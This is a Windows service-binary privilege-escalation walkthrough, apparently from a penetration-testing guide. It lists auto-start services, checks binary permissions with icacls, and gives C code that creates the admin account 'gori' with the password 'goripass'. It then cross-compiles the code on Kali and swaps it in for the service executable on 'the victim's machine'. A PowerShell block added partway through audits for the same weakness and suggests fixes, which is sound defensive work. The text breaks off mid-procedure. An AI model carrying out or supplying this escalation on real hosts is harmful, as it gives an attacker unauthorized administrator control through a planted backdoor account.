Run whoami /priv and check whether SeShutdownPrivilege shows as "Disabled"; then move on to the next step.
Find all services whose start mode is "auto" (they start automatically at system boot):
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
If the command returns any services, always check the permissions of each binary with the icacls command:
icacls "file_path"
We are looking for (F) (full control) or (W) (write) entries granted to the current user or to a group it belongs to; either one lets the file be replaced.
If the first path does not have them, check the other paths the command returned, if any.
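As an added defender-side example that is not part of the original walkthrough, the same check as the wmic and icacls steps above can be run as a PowerShell audit: it lists auto-start service binaries outside C:\Windows whose ACL grants write, modify, delete or full control to a low-privilege identity, and prints a suggested icacls fix. The identity list and the fix command are illustrative assumptions, not part of the original page.

```powershell
# Added audit example, not part of the original walkthrough. Run as an
# administrator on the host being audited. The identity list below is an
# illustrative assumption; extend it with any local low-privilege groups.
$LowPrivIdentities = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                       'Everyone', 'NT AUTHORITY\INTERACTIVE')
# Any of these rights lets a principal rewrite or replace the binary.
$WriteRights = [System.Security.AccessControl.FileSystemRights]'FullControl, Modify, Write, WriteData, Delete'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Drop arguments: take the quoted path, otherwise everything up to the first .exe
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.*?\.exe)')   { return $Matches[1] }
    return $PathName.Trim()
}

function Find-WritableServiceBinary {
    # Auto-start services outside C:\Windows, mirroring the wmic filter above.
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName -and
                       $_.PathName -notmatch '(?i)^"?C:\\Windows\\' } |
        ForEach-Object {
            $svc  = $_
            $path = Get-ServiceBinaryPath $svc.PathName
            if (-not (Test-Path -LiteralPath $path)) { return }
            foreach ($ace in (Get-Acl -LiteralPath $path).Access) {
                $id = $ace.IdentityReference.Value
                if (($ace.AccessControlType -eq 'Allow') -and
                    ($LowPrivIdentities -contains $id) -and
                    (($ace.FileSystemRights -band $WriteRights) -ne 0)) {
                    # Suggested fix: remove the offending grant, then re-grant read/execute only.
                    [pscustomobject]@{
                        Service      = $svc.Name
                        RunsAs       = $svc.StartName
                        Binary       = $path
                        Identity     = $id
                        Rights       = $ace.FileSystemRights
                        SuggestedFix = "icacls `"$path`" /remove:g `"$id`" /grant:r `"$id`":RX"
                    }
                }
            }
        }
}

Find-WritableServiceBinary | Format-Table -AutoSize
```

An empty table means no auto-start service outside C:\Windows has a binary writable by the listed identities; after applying a fix, re-run icacls on the path to confirm only (RX) remains for that identity.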
Once you find an executable with these weak permissions, we can write a small program that creates an administrator account.
#include <stdlib.h>

/* When run, creates a local user and adds it to the Administrators group. */
int main(void)
{
    int i;
    i = system("net user gori goripass /add");               /* create the account */
    i = system("net localgroup administrators gori /add");   /* make it a local admin */
    return 0;
}
This program adds the account gori (password goripass) and puts it in the local Administrators group.
Cross-compile the program on the local Kali machine:
i686-w64-mingw32-gcc adduser.c -o adduser.exe
Transfer the file to the victim's machine.
Now we need to rename the original service executable to something else so that we can replace it with our evil executable.